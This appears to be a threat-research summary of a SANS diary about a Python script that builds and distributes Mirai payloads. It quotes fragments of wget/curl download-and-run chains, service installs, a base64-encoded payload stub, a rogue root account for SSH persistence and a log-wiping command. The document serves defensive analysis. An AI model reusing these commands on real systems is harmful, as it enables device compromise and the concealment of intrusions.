Threat Research

Overview of a Mirai Payload Generator

Securonix

A detailed look at a Mirai payload generator shows how Linux devices were being abused to deliver Mirai payloads across multiple architectures using web, FTP, and TFTP services. The post also describes a backdoor created via a rogue root account and multi-architecture download/execution chains for Mirai payloads. #Mirai #Yakuza #BigBots #iplogger #pastebin

Keypoints

  • The Mirai botnet historically targeted Linux-based devices such as camera recorders and remains active, with hundreds of Mirai requests hitting honeypots daily.
  • A Python script generates a Mirai payload (SHA256:f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e) and deploys network services (FTP, HTTP, TFTP) to host and distribute payloads.
  • The script retrieves the host’s public IP via api.ipify.org, then defines multiple architectures (e.g., x86.yakuza, mips.yakuza, arm4.yakuza, etc.).
  • It uses yum to install and start dependencies (httpd, xinetd, tftp, vsftpd) and configures TFTP/FTP services to serve payloads.
  • A backdoor is created by adding an alternate root account (e.g., bigbots) to enable SSH access and persistence.
  • Payload delivery chains rely on multiple fetch methods (wget, curl, ftpget, tftp) across various directories to download and execute the payload.
  • Indicators point to related sources (Malpedia, Sans diary, Abuse.ch, Pastebin) for Mirai research and sample data.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The payloads are downloaded and deployed via wget, curl, ftpget, and tftp to fetch Mirai payloads from a host, e.g. “wget http://’ + ip + ‘/’+bin_directory+’/’+bin_prefix+i+’; curl -O http://’ + ip + ‘/’+bin_directory+’/’+bin_prefix+i”
  • [T1569.002] Service Execution – The attacker installs and starts web/file services (httpd, xinetd, tftp, vsftpd) to host and distribute payloads, e.g. “yum install httpd -y … service httpd start”
  • [T1136.001] Create Account – A rogue root account (bigbots) is added to gain persistence and SSH access, e.g. “The host is now reachable via SSH with the rogue user ‘bigbots’.”
  • [T1027] Obfuscated/Compressed Files and Information – Base64-encoded data is decoded to reveal payload content, e.g. “encoded = “Y2QgL3RtcDsgd2d …”; exploit = str(base64.b64decode(encoded))”
  • [T1059.003] Command and Scripting Interpreter – Shell and Python-based commands drive installation and execution (e.g., “def run(cmd): subprocess.call(cmd, shell=True)”; “yum install httpd -y”)
  • [T1070.004] Indicator Removal on Host – Attempts to erase indicators by removing logs, e.g. “rm -rf /var/log/lastlog history -c clear”

Indicators of Compromise

  • [Hash] context – f56391e9645df1058847e28af6918c64ddc344d9f328b3dde9015213d5efdc7e
  • [Domain] context – iplogger.com, pastebin.com, and malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
  • [File name] context – tyakuza.sh, yakuza1.sh, yakuza2.sh
  • [File name] context – /bin/busybox (copied to /tmp/)

Read more: https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint